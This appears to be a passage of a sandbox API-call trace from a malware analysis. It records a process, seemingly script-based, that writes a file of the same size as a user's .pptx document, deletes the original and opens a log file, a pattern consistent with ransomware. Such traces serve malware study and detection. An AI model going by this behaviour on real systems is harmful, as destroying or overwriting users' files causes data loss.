0x9ba1c8 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.823] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd630 [0173.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd630, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.824] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.825] WriteFile (in: hFile=0x120, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0x12a51, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0x12a51, lpOverlapped=0x0) returned 1 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0173.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.827] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.829] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.829] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.829] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.829] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0173.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.831] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.832] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFilePart=0x0) returned 0x3a [0173.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0xcf7a0e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0x90af58 [0173.833] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lvw qc5ro32oh.pptx")) returned 1 [0173.838] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0xcf7a0e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0 [0173.838] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.856] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.856] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.856] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.856] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.856] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.856] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.856] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.856] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.857] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 